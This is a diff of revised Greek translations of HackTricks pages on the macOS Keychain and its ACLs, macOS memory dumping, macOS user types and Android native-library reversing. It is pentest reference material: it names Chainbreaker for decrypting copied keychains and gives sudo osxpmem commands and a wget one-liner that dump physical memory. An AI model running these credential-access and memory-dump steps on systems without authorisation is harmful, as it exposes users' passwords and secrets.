* Το **Keychain του Συστήματος** (`/Library/Keychains/System.keychain`), το οποίο αποθηκεύει **διαπιστεύσεις σε επίπεδο συστήματος** όπως κωδικοί WiFi, πιστοποιητικά ρίζας συστήματος, ιδιωτικά κλειδιά συστήματος και κωδικοί εφαρμογών συστήματος.
|
||||
* Το **Keychain του Συστήματος** (`/Library/Keychains/System.keychain`), το οποίο αποθηκεύει **διαπιστευτήρια που ισχύουν για ολόκληρο το σύστημα** όπως κωδικοί WiFi, πιστοποιητικά ρίζας συστήματος, ιδιωτικά κλειδιά συστήματος και κωδικοί εφαρμογών συστήματος.
|
||||
|
||||
### Πρόσβαση στο Keychain Κωδικών
|
||||
|
||||
Αυτά τα αρχεία, παρόλο που δεν έχουν ενσωματωμένη προστασία και μπορούν να **κατεβαστούν**, είναι κρυπτογραφημένα και απαιτούν τον **καθαρό κείμενο του κωδικού του χρήστη για να αποκρυπτογραφηθούν**. Ένα εργαλείο όπως το [**Chainbreaker**](https://github.com/n0fate/chainbreaker) μπορεί να χρησιμοποιηθεί για την αποκρυπτογράφηση.
|
||||
Αυτά τα αρχεία, παρόλο που δεν έχουν ενσωματωμένη προστασία και μπορούν να **κατεβάστε**, είναι κρυπτογραφημένα και απαιτούν τον **καθαρό κείμενο του κωδικού του χρήστη για να αποκρυπτογραφηθούν**. Ένα εργαλείο όπως το [**Chainbreaker**](https://github.com/n0fate/chainbreaker) μπορεί να χρησιμοποιηθεί για την αποκρυπτογράφηση.
|
||||
|
||||
## Προστασίες Καταχωρήσεων Keychain
|
||||
|
||||
|
@ -47,15 +47,15 @@
|
|||
* **ACLAuhtorizationExportWrapped**: Επιτρέπει στον κάτοχο να λάβει το καθαρό κείμενο κρυπτογραφημένο με έναν άλλο καθορισμένο κωδικό.
|
||||
* **ACLAuhtorizationAny**: Επιτρέπει στον κάτοχο να εκτελέσει οποιαδήποτε ενέργεια.
|
||||
|
||||
Οι ACLs συνοδεύονται επιπλέον από μια **λίστα εμπιστευμένων εφαρμογών** που μπορούν να εκτελέσουν αυτές τις ενέργειες χωρίς προτροπή. Αυτό μπορεί να είναι:
|
||||
Οι ACLs συνοδεύονται επίσης από μια **λίστα αξιόπιστων εφαρμογών** που μπορούν να εκτελέσουν αυτές τις ενέργειες χωρίς προτροπή. Αυτό μπορεί να είναι:
|
||||
|
||||
*  **N`il`** (δεν απαιτείται εξουσιοδότηση, **όλοι είναι εμπιστευμένοι**)
|
||||
* Μια **κενή** λίστα (**κανείς δεν είναι εμπιστευμένος**)
|
||||
*  **N`il`** (δεν απαιτείται άδεια, **όλοι είναι αξιόπιστοι**)
|
||||
* Μια **κενή** λίστα (**κανείς δεν είναι αξιόπιστος**)
|
||||
* **Λίστα** συγκεκριμένων **εφαρμογών**.
|
||||
|
||||
Επίσης, η καταχώρηση μπορεί να περιέχει το κλειδί **`ACLAuthorizationPartitionID`,** το οποίο χρησιμοποιείται για την αναγνώριση του **teamid, apple,** και **cdhash.**
|
||||
Επίσης, η καταχώρηση μπορεί να περιέχει το κλειδί **`ACLAuthorizationPartitionID`,** το οποίο χρησιμοποιείται για την ταυτοποίηση του **teamid, apple,** και **cdhash.**
|
||||
|
||||
* Εάν το **teamid** είναι καθορισμένο, τότε για να **έχει πρόσβαση στην τιμή της καταχώρησης** χωρίς **προτροπή** η χρησιμοποιούμενη εφαρμογή πρέπει να έχει το **ίδιο teamid**.
|
||||
* Εάν το **teamid** είναι καθορισμένο, τότε για να **έχει πρόσβαση στην τιμή της καταχώρησης χωρίς** προτροπή η χρησιμοποιούμενη εφαρμογή πρέπει να έχει το **ίδιο teamid**.
|
||||
* Εάν το **apple** είναι καθορισμένο, τότε η εφαρμογή πρέπει να είναι **υπογεγραμμένη** από την **Apple**.
|
||||
* Εάν το **cdhash** είναι υποδειγμένο, τότε η εφαρμογή πρέπει να έχει το συγκεκριμένο **cdhash**.
|
||||
|
||||
|
@ -72,7 +72,7 @@
|
|||
Όταν μια **εφαρμογή δημιουργεί μια καταχώρηση στο keychain**, οι κανόνες είναι ελαφρώς διαφορετικοί:
|
||||
|
||||
* Όλες οι εφαρμογές μπορούν να κρυπτογραφήσουν.
|
||||
* Μόνο η **δημιουργούσα εφαρμογή** (ή οποιεσδήποτε άλλες εφαρμογές προστέθηκαν ρητά) μπορούν να εξάγουν/αποκρυπτογραφήσουν (χωρίς προτροπή του χρήστη).
|
||||
* Μόνο η **δημιουργούσα εφαρμογή** (ή οποιεσδήποτε άλλες εφαρμογές προστέθηκαν ρητά) μπορεί να εξάγει/αποκρυπτογραφήσει (χωρίς προτροπή του χρήστη).
|
||||
* Όλες οι εφαρμογές μπορούν να δουν τον έλεγχο ακεραιότητας.
|
||||
* Καμία εφαρμογή δεν μπορεί να αλλάξει τις ACLs.
|
||||
* Το **partitionID** ορίζεται σε **`teamid:[teamID εδώ]`**.
|
||||
|
@ -99,15 +99,15 @@ security set-generic-password-parition-list -s "test service" -a "test acount" -
|
|||
Καταχωρήστε και λάβετε **πληροφορίες** για κάθε καταχώρηση κλειδιού:
|
||||
|
||||
* Η ΑΡΙ **`SecItemCopyMatching`** δίνει πληροφορίες για κάθε καταχώρηση και υπάρχουν ορισμένα χαρακτηριστικά που μπορείτε να ορίσετε κατά τη χρήση του:
|
||||
* **`kSecReturnData`**: Εάν είναι true, θα προσπαθήσει να αποκρυπτογραφήσει τα δεδομένα (ορίστε το σε false για να αποφύγετε πιθανά αναδυόμενα παράθυρα)
|
||||
* **`kSecReturnRef`**: Λάβετε επίσης αναφορά στο στοιχείο του keychain (ορίστε το σε true σε περίπτωση που αργότερα δείτε ότι μπορείτε να αποκρυπτογραφήσετε χωρίς παράθυρο ειδοποίησης)
|
||||
* **`kSecReturnData`**: Εάν είναι true, θα προσπαθήσει να αποκρυπτογραφήσει τα δεδομένα (ορίστε το false για να αποφύγετε πιθανά αναδυόμενα παράθυρα)
|
||||
* **`kSecReturnRef`**: Λάβετε επίσης αναφορά στο στοιχείο του keychain (ορίστε το true σε περίπτωση που αργότερα δείτε ότι μπορείτε να αποκρυπτογραφήσετε χωρίς παράθυρο ειδοποίησης)
|
||||
* **`kSecReturnAttributes`**: Λάβετε μεταδεδομένα σχετικά με τις καταχωρήσεις
|
||||
* **`kSecMatchLimit`**: Πόσα αποτελέσματα να επιστραφούν
|
||||
* **`kSecClass`**: Τι είδος καταχώρησης keychain
|
||||
|
||||
Λάβετε τα **ACLs** κάθε καταχώρησης:
|
||||
|
||||
* Με την ΑΡΙ **`SecAccessCopyACLList`** μπορείτε να λάβετε το **ACL για το στοιχείο του keychain**, και θα επιστρέψει μια λίστα με ACLs (όπως `ACLAuhtorizationExportClear` και τα άλλα προηγουμένως αναφερθέντα) όπου κάθε λίστα έχει:
|
||||
* Με την ΑΡΙ **`SecAccessCopyACLList`** μπορείτε να λάβετε το **ACL για το στοιχείο του keychain**, και θα επιστρέψει μια λίστα με ACLs (όπως `ACLAuhtorizationExportClear` και τα άλλα προαναφερθέντα) όπου κάθε λίστα έχει:
|
||||
* Περιγραφή
|
||||
* **Λίστα Εμπιστευμένων Εφαρμογών**. Αυτό μπορεί να είναι:
|
||||
* Μια εφαρμογή: /Applications/Slack.app
|
||||
|
@ -140,15 +140,15 @@ security set-generic-password-parition-list -s "test service" -a "test acount" -
|
|||
|
||||
* **Αόρατο**: Είναι ένα λογικό σήμα για να **κρύψετε** την καταχώρηση από την εφαρμογή **UI** Keychain
|
||||
* **Γενικό**: Χρησιμοποιείται για την αποθήκευση **μεταδεδομένων** (άρα ΔΕΝ ΕΙΝΑΙ ΚΡΥΠΤΟΓΡΑΦΗΜΕΝΟ)
|
||||
* Η Microsoft αποθήκευε σε καθαρό κείμενο όλα τα ανανεωμένα τεκμήρια για πρόσβαση σε ευαίσθητα σημεία.
|
||||
* Η Microsoft αποθήκευε σε καθαρό κείμενο όλα τα ανανεωμένα τοκεν για πρόσβαση σε ευαίσθητα σημεία.
|
||||
|
||||
## Αναφορές
|
||||
|
||||
* [**#OBTS v5.0: "Lock Picking the macOS Keychain" - Cody Thomas**](https://www.youtube.com/watch?v=jKE1ZW33JpY)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε εάν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
|
@ -167,7 +167,7 @@ security set-generic-password-parition-list -s "test service" -a "test acount" -
|
|||
* Εάν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγράφου**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Red Team AWS του HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Red Team του HackTricks AWS)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
|
@ -14,9 +14,9 @@
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
|
@ -32,11 +32,11 @@
|
|||
|
||||
### Αρχεία Swap
|
||||
|
||||
Τα αρχεία swap, όπως το `/private/var/vm/swapfile0`, λειτουργούν ως **μνήμες cache όταν η φυσική μνήμη είναι γεμάτη**. Όταν δεν υπάρχει άλλος χώρος στη φυσική μνήμη, τα δεδομένα μεταφέρονται σε ένα αρχείο swap και στη συνέχεια επαναφέρονται στη φυσική μνήμη όταν χρειάζεται. Μπορεί να υπάρχουν πολλά αρχεία swap, με ονόματα όπως swapfile0, swapfile1 κ.λπ.
|
||||
Τα αρχεία swap, όπως το `/private/var/vm/swapfile0`, λειτουργούν ως **μνήμες cache όταν η φυσική μνήμη είναι γεμάτη**. Όταν δεν υπάρχει άλλος χώρος στη φυσική μνήμη, τα δεδομένα μεταφέρονται σε ένα αρχείο swap και στη συνέχεια επαναφέρονται στη φυσική μνήμη όποτε χρειάζεται. Μπορεί να υπάρχουν πολλά αρχεία swap, με ονόματα όπως swapfile0, swapfile1 κλπ.
|
||||
|
||||
### Εικόνα Hibernation
|
||||
|
||||
Το αρχείο που βρίσκεται στο `/private/var/vm/sleepimage` είναι κρίσιμο κατά τη διάρκεια της **λειτουργίας υπνώσεως**. **Τα δεδομένα από τη μνήμη αποθηκεύονται σε αυτό το αρχείο όταν το OS X κάνει υπνώση**. Κατά το ξύπνημα του υπολογιστή, το σύστημα ανακτά τα δεδομένα μνήμης από αυτό το αρχείο, επιτρέποντας στον χρήστη να συνεχίσει από το σημείο που σταμάτησε.
|
||||
Το αρχείο που βρίσκεται στο `/private/var/vm/sleepimage` είναι κρίσιμο κατά τη διάρκεια της **λειτουργίας υπνώσεως**. **Τα δεδομένα από τη μνήμη αποθηκεύονται σε αυτό το αρχείο όταν το OS X κάνει υπνώση**. Κατά την αφύπνιση του υπολογιστή, το σύστημα ανακτά τα δεδομένα μνήμης από αυτό το αρχείο, επιτρέποντας στον χρήστη να συνεχίσει από το σημείο που σταμάτησε.
|
||||
|
||||
Αξίζει να σημειωθεί ότι σε μοντέρνα συστήματα MacOS, αυτό το αρχείο είναι συνήθως κρυπτογραφημένο για λόγους ασφαλείας, κάτι που δυσκολεύει την ανάκτηση.
|
||||
|
||||
|
@ -44,13 +44,13 @@
|
|||
|
||||
### Καταγραφές Πίεσης Μνήμης
|
||||
|
||||
Ένα άλλο σημαντικό αρχείο σχετικά με τη μνήμη σε συστήματα MacOS είναι το **αρχείο καταγραφής πίεσης μνήμης**. Αυτά τα αρχεία καταγραφής βρίσκονται στο `/var/log` και περιέχουν λεπτομερείς πληροφορίες σχετικά με τη χρήση μνήμης του συστήματος και τα γεγονότα πίεσης. Μπορούν να είναι ιδιαίτερα χρήσιμα για τη διάγνωση θεμάτων που σχετίζονται με τη μνήμη ή την κατανόηση του τρόπου με τον οποίο το σύστημα διαχειρίζεται τη μνήμη με τον χρόνο.
|
||||
Ένα άλλο σημαντικό αρχείο σχετικό με τη μνήμη στα συστήματα MacOS είναι το **αρχείο καταγραφής πίεσης μνήμης**. Αυτά τα αρχεία καταγραφής βρίσκονται στο `/var/log` και περιέχουν λεπτομερείς πληροφορίες σχετικά με τη χρήση μνήμης του συστήματος και τα γεγονότα πίεσης. Μπορούν να είναι ιδιαίτερα χρήσιμα για τη διάγνωση θεμάτων που σχετίζονται με τη μνήμη ή την κατανόηση του τρόπου με τον οποίο το σύστημα διαχειρίζεται τη μνήμη με τον χρόνο.
|
||||
|
||||
## Απορρόφηση μνήμης με το osxpmem
|
||||
|
||||
Για να απορροφήσετε τη μνήμη σε μια μηχανή MacOS, μπορείτε να χρησιμοποιήσετε το [**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip).
|
||||
|
||||
**Σημείωση**: Οι παρακάτω οδηγίες θα λειτουργήσουν μόνο για Mac με αρχιτεκτονική Intel. Αυτό το εργαλείο είναι τώρα αρχειοθετημένο και η τελευταία έκδοση ήταν το 2017. Το δυαδικό που κατεβάζετε χρησιμοποιώντας τις παρακάτω οδηγίες στοχεύει σε chips Intel καθώς το Apple Silicon δεν υπήρχε το 2017. Μπορεί να είναι δυνατό να μεταγλωττίσετε το δυαδικό για αρχιτεκτονική arm64 αλλά θα πρέπει να το δοκιμάσετε μόνοι σας.
|
||||
**Σημείωση**: Οι παρακάτω οδηγίες θα λειτουργήσουν μόνο για Mac με αρχιτεκτονική Intel. Αυτό το εργαλείο είναι τώρα αρχειοθετημένο και η τελευταία έκδοση ήταν το 2017. Το δυαδικό που κατεβάζετε χρησιμοποιώντας τις παρακάτω οδηγίες στοχεύει σε Intel chips καθώς το Apple Silicon δεν υπήρχε το 2017. Μπορεί να είναι δυνατόν να μεταγλωττίσετε το δυαδικό για αρχιτεκτονική arm64 αλλά θα πρέπει να το δοκιμάσετε μόνοι σας.
|
||||
```bash
|
||||
#Dump raw format
|
||||
sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
|
||||
|
@ -58,14 +58,14 @@ sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
|
|||
#Dump aff4 format
|
||||
sudo osxpmem.app/osxpmem -o /tmp/dump_mem.aff4
|
||||
```
|
||||
Εάν βρείτε αυτό το σφάλμα: `osxpmem.app/MacPmem.kext failed to load - (libkern/kext) authentication failure (file ownership/permissions); check the system/kernel logs for errors or try kextutil(8)` Μπορείτε να το διορθώσετε κάνοντας:
|
||||
Αν βρείτε αυτό το σφάλμα: `osxpmem.app/MacPmem.kext failed to load - (libkern/kext) authentication failure (file ownership/permissions); check the system/kernel logs for errors or try kextutil(8)` Μπορείτε να το διορθώσετε κάνοντας:
|
||||
```bash
|
||||
sudo cp -r osxpmem.app/MacPmem.kext "/tmp/"
|
||||
sudo kextutil "/tmp/MacPmem.kext"
|
||||
#Allow the kext in "Security & Privacy --> General"
|
||||
sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
|
||||
```
|
||||
**Άλλα σφάλματα** μπορεί να διορθωθούν επιτρέποντας τη φόρτωση του kext στις "Ασφάλεια & Απορρήτου --> Γενικά", απλά **επιτρέψτε** το.
|
||||
**Άλλα σφάλματα** μπορεί να διορθωθούν επιτρέποντας τη φόρτωση του kext στο "Ασφάλεια & Απορρήτου --> Γενικά", απλά **επιτρέψτε** το.
|
||||
|
||||
Μπορείτε επίσης να χρησιμοποιήσετε αυτό το **oneliner** για να κατεβάσετε την εφαρμογή, να φορτώσετε το kext και να κάνετε dump τη μνήμη:
|
||||
|
||||
|
@ -76,13 +76,13 @@ cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-
|
|||
```
|
||||
{% endcode %}
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι ένας μηχανισμός αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι ένας μηχανισμός αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες malware**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αρπαγών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από malware που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τον μηχανισμό τους δωρεάν στο:
|
||||
|
||||
|
@ -97,7 +97,7 @@ cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-
|
|||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.
|
||||
* **Εγγραφείτε** 💬 [**στην ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφή**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,7 +2,7 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
|
@ -14,9 +14,9 @@
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
|
@ -30,7 +30,7 @@
|
|||
|
||||
### Κοινοί Χρήστες
|
||||
|
||||
* **Daemon**: Χρήστης που είναι κρατημένος για συστημικούς δαίμονες. Τα προεπιλεγμένα ονόματα λογαριασμών δαίμονα συνήθως ξεκινούν με ένα "\_":
|
||||
* **Daemon**: Χρήστης που είναι κρατημένος για συστημικούς δαίμονες. Τα ονόματα των προεπιλεγμένων λογαριασμών δαίμονα συνήθως ξεκινούν με "\_":
|
||||
|
||||
```bash
|
||||
_amavisd, _analyticsd, _appinstalld, _appleevents, _applepay, _appowner, _appserver, _appstore, _ard, _assetcache, _astris, _atsserver, _avbdeviced, _calendar, _captiveagent, _ces, _clamav, _cmiodalassistants, _coreaudiod, _coremediaiod, _coreml, _ctkd, _cvmsroot, _cvs, _cyrus, _datadetectors, _demod, _devdocs, _devicemgr, _diskimagesiod, _displaypolicyd, _distnote, _dovecot, _dovenull, _dpaudio, _driverkit, _eppc, _findmydevice, _fpsd, _ftp, _fud, _gamecontrollerd, _geod, _hidd, _iconservices, _installassistant, _installcoordinationd, _installer, _jabber, _kadmin_admin, _kadmin_changepw, _knowledgegraphd, _krb_anonymous, _krb_changepw, _krb_kadmin, _krb_kerberos, _krb_krbtgt, _krbfast, _krbtgt, _launchservicesd, _lda, _locationd, _logd, _lp, _mailman, _mbsetupuser, _mcxalr, _mdnsresponder, _mobileasset, _mysql, _nearbyd, _netbios, _netstatistics, _networkd, _nsurlsessiond, _nsurlstoraged, _oahd, _ondemand, _postfix, _postgres, _qtss, _reportmemoryexception, _rmd, _sandbox, _screensaver, _scsd, _securityagent, _softwareupdate, _spotlight, _sshd, _svn, _taskgated, _teamsserver, _timed, _timezone, _tokend, _trustd, _trustevaluationagent, _unknown, _update_sharing, _usbmuxd, _uucp, _warmd, _webauthserver, _windowserver, _www, _wwwproxy, _xserverdocs
|
||||
|
@ -49,7 +49,7 @@ for i in "${state[@]}"; do sysadminctl -"${i}" status; done;
|
|||
|
||||
### Δικαιώματα Χρήστη
|
||||
|
||||
* **Κανονικός Χρήστης**: Ο πιο βασικός τύπος χρήστη. Αυτός ο χρήστης χρειάζεται άδεια από έναν διαχειριστή χρήστη όταν προσπαθεί να εγκαταστήσει λογισμικό ή να εκτελέσει άλλες προηγμένες εργασίες. Δεν μπορούν να το κάνουν μόνοι τους.
|
||||
* **Διαχειριστής Χρήστη**: Ένας χρήστης που λειτουργεί τις περισσότερες φορές ως κανονικός χρήστης αλλά του επιτρέπεται επίσης να εκτελέσει ενέργειες root όπως η εγκατάσταση λογισμικού και άλλες διοικητικές εργασίες. Όλοι οι χρήστες που ανήκουν στην ομάδα διαχειριστών **έχουν πρόσβαση στο root μέσω του αρχείου sudoers**.
|
||||
* **Τυπικός Χρήστης**: Ο πιο βασικός τύπος χρήστη. Αυτός ο χρήστης χρειάζεται άδεια από έναν διαχειριστή χρήστη όταν προσπαθεί να εγκαταστήσει λογισμικό ή να εκτελέσει άλλες προηγμένες εργασίες. Δεν μπορούν να το κάνουν μόνοι τους.
|
||||
* **Διαχειριστής Χρήστη**: Ένας χρήστης που λειτουργεί τις περισσότερες φορές ως τυπικός χρήστης αλλά του επιτρέπεται επίσης να εκτελέσει ενέργειες root όπως εγκατάσταση λογισμικού και άλλες διοικητικές εργασίες. Όλοι οι χρήστες που ανήκουν στην ομάδα διαχειριστών έχουν **πρόσβαση στο root μέσω του αρχείου sudoers**.
|
||||
* **Root**: Ο Root είναι ένας χρήστης που επιτρέπεται να εκτελέσει σχεδόν οποιαδήποτε ενέργεια (υπάρχουν περιορισμοί που επιβάλλονται από προστασίες όπως η Προστασία Ακεραιότητας του Συστήματος).
|
||||
* Για παράδειγμα, ο root δεν θα μπορούσε να τοποθετήσει ένα αρχείο μέσα στο `/System`
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
# Αντιστροφή Τοπικών Βιβλιοθηκών
|
||||
# Αναστροφή Τοπικών Βιβλιοθηκών
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -10,13 +10,13 @@
|
|||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του GitHub.
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
|
@ -30,30 +30,30 @@
|
|||
|
||||
**Για περισσότερες πληροφορίες ελέγξτε: [https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html](https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html)**
|
||||
|
||||
Οι εφαρμογές Android μπορούν να χρησιμοποιούν τοπικές βιβλιοθήκες, συνήθως γραμμένες σε C ή C++, για εργασίες κρίσιμες για την απόδοση. Οι δημιουργοί κακόβουλου λογισμικού χρησιμοποιούν επίσης αυτές τις βιβλιοθήκες, καθώς είναι πιο δύσκολο να αντιστραφούν από τον κώδικα DEX. Η ενότητα επικεντρώνεται στις δεξιότητες αντιστροφής κώδικα που προσαρμόζονται στο Android, αντί να διδάσκει γλώσσες συναρμολόγησης. Παρέχονται εκδόσεις ARM και x86 των βιβλιοθηκών για συμβατότητα.
|
||||
